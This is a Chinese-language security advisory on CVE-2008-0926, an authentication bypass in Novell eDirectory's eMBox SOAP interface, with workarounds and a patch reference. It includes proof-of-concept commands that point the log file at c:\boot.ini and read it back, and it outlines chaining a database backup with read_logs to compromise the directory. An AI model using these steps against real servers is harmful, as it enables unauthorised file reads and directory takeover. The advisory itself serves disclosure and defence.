安全研究

安全漏洞
Novell eDirectory eMBox工具edirutil命令绕过认证漏洞

发布日期:2008-03-25
更新日期:2008-05-06

受影响系统:
Novell eDirectory 8.8
Novell eDirectory 8.7.3.9
不受影响系统:
Novell eDirectory 8.8.2
描述:
BUGTRAQ  ID: 28441
CVE(CAN) ID: CVE-2008-0926

Novell eDirectory是一个的跨平台的目录服务器。

Novell eDirectory处理访问认证时存在漏洞,远程攻击者可能利用此漏洞获取非授权访问。

可通过/SOAP URL使用Novell eDirectory的eMBox工具的SOAP接口,通常是通过命令行客户端edirutil.exe使用的。默认下未经认证的攻击者可以利用这个工具获得完全的DN、修改日志文件名称、读取日志文件内容,或停止和启动eDirectory组件。此外攻击者还可以通过其他命令将数据库备份到文件,结合read_logs操作就可以完全入侵目录。

<*来源:Nicholas Gregorie
  
  链接:http://secunia.com/advisories/29527
        http://marc.info/?l=bugtraq&m=121001774516596&w=2
        http://www.novell.com/support/viewContent.do?externalId=3866911&sliceId=1
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

nicob $> ./eMBox.pl 192.168.1.1 set_logfile c:\\boot.ini
Logger settings changed successfully

nicob $> ./eMBox.pl 192.168.1.1 read_logs              
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Server" /fastdetect

建议:
临时解决方法:

* 卸载embox模块。

在NetWare上,重新命名SYS:\SYSTEM\EMBOX.NLM。

在Solaris/Linux上,重新命名/usr/lib/nds-modules/libembox.so.1.0.0并删除/usr/lib/nds-modules/ndsmodules.conf中的embox项。

在Windows上,重新命名c:\novell\nds\embox.dlm并将eDirectory Services中的embox服务设置为手工启动。

厂商补丁:

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://support.novell.com/security-alerts

浏览次数:2473
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障